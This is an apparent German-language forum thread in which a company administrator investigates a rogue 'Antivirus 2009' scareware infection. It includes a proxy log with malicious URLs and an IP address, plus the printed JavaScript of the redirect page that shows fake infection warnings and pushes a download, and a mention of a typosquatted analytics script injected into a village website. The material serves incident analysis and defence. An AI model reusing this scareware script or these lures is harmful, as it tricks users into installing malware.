Hier in der Firma hat sich vor 2 Wochen ein Programm "antivirus2009-scanner" installiert, als ein Mitarbeiter nichtsahnend im Internet surfte. Gemein war der Button "Soll die Software installiert werden? Ja - Nein"... er hat zwar auf "Nein" geklickt, aber genau das war der Fehler. Die Software hat sich installiert. Habe sie anschließend wieder runtergeworfen, die Reg bereinigt, übriggebliebene Verzeichnisse gelöscht und einen "echten" Virenscanner drüberlaufen lassen. Nichts zu finden.

Ich schreibe gerade einen Bericht dazu, damit andere Mitarbeiter lernen, dass sie eben nicht auf "Nein" oder "Abbrechen" klicken dürfen, sondern direkt hier anrufen. Aber dazu muss ich erstmal verstehen, woher die Malware überhaupt gekommen ist.

Hier ein Auszug aus dem Log:


2008:07:07-08:46:15 method="GET" statuscode="404" url="http://www.irgendeineurl.de/favicon.ico" error="" category="1710"
2008:07:07-08:48:56 method="GET" statuscode="404" url="http://www.irgendeineurl.de/SG%20LWL%2004/Banner-Schalter/start-Dateien/1.gif"
2008:07:07-08:48:56 method="GET" statuscode="404" url="http://www.irgendeineurl.de/SG%20LWL%2004/Banner-Schalter/start-Dateien/1w.gif"
2008:07:07-08:48:56 method="GET" statuscode="404" url="http://www.irgendeineurl.de/SG%20LWL%2004/Banner-Schalter/start-Dateien/bg_wr.gif"
2008:07:07-08:48:56 method="GET" statuscode="404" url="http://www.irgendeineurl.de/SG%20LWL%2004/Banner-Schalter/start-Dateien/bg_rw.gif"
2008:07:07-08:48:57 method="GET" statuscode="302" url="http://58.65.234.163/e/adsr.php"
2008:07:07-08:48:58 method="POST" statuscode="404" url="http://activex.microsoft.com/objects/ocget.dll"
2008:07:07-08:48:58 method="POST" statuscode="404" url="http://activex.microsoft.com/objects/ocget.dll"
2008:07:07-08:48:58 method="POST" statuscode="404" url="http://codecs.microsoft.com/isapi/ocget.dll"
2008:07:07-08:48:58 method="POST" statuscode="404" url="http://activex.microsoft.com/objects/ocget.dll"
2008:07:07-08:48:58 method="GET" statuscode="302" url="http://antivirus2009-scanner.com/soft.php?aid=014202&d=2&product=XPA"


Die erste URL ist eine kleine Dorf-Website, nichts aufregendes, gehackt wurde die sicher nicht. Aber vielleicht lag das Problem auch in einer gif-Datei, oder im activex... auf jeden Fall ist mir schleierhaft, was genau die Malware-URL aufgerufen hatte. Was meinen die Experten?

url="http://58.65.234.163/e/adsr.php"
<html>
<body>
<script src='window.js'></script>
<script>
showwindow('x:'+window.screen.width/2+'; y:'+(window.screen.height/2-30), 'w:1; h:1');

is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
is_IE=false;
if (navigator.appName.toLowerCase()=='microsoft internet explorer'){
if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; }
}

if(confirm('ATTENTION! If your computer is infected, you could suffer data loss, erratic PC behaviour, PC freezes and creahes.\n\nDetect and remove viruses before they damage your computer!\nAntivirus 2009 will perform a quick and 100% FREE scan of your computer for Viruses, Spyware and Adware.\n\nDo you want to install Antivirus 2009 to scan your computer for malware now? (Recommended)'))
{
alert('Antivirus 2009 will scan your system for threats now.\n\nPlease select "RUN" or "OPEN" when prompted to start the installation.\n\nThis file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.');


};

showwindow('x:0; y:0', 'w:' + window.screen.width + '; h:' + window.screen.height);
window.resizeTo(window.screen.width, window.screen.height);

window.open('_freescan.php?aid=77014202', '_self');
window.focus();
</script>
</body>
</html>

da kommt deine Malware "her" (na eigentlich von "http://antivirus2009-scanner.com/soft.php?aid=014202&d=2&product=XPA")

schau doch mal auf die erste Seite, ob in derem Quelltext diese Seite (die mit der IP) aufgerufen/eingebunden wird

Remove Internetprotection2009 - Internetprotection2009.com Removal Instructions (http://www.removeonline.com/remove-internetprotection2009-internetprotection2009-com-removal-instructions/)
Internetprotection2009.com is a another fake security web-site that promotes rogue anti-spyware software called Antivirus 2009. Antivirus 2009 downloads additional trojans on the user’s computer for maximum destructions. Once inside, these trojans shows fake warning alerts and annoying popups.

Stimmt, irgendwie dachte ich, dass die IP dynamisch sei und sich immerwieder ändert. Soweit ich das sehe, fängt alles auf www.neu-listernohl.de an, diese Dorfseite. Mit NoScript sehe ich, dass von dort google.analytlcs.com geladen werden soll (man beachte das l statt i). Aber ich sehe es dort nirgends im Quelltext. In einem WoW Forum gab es auch mal so einen Fall (google-Suche nach googleanalytlcs.com), wo fremder Code in eine Website geschleust wurde. Aber ich verstehe nicht wie.

Ich werd den Webmaster mal besser anmailen (Klasse, Impressum gibts, aber keine Kontaktmöglichkeit *kopfschüttel*)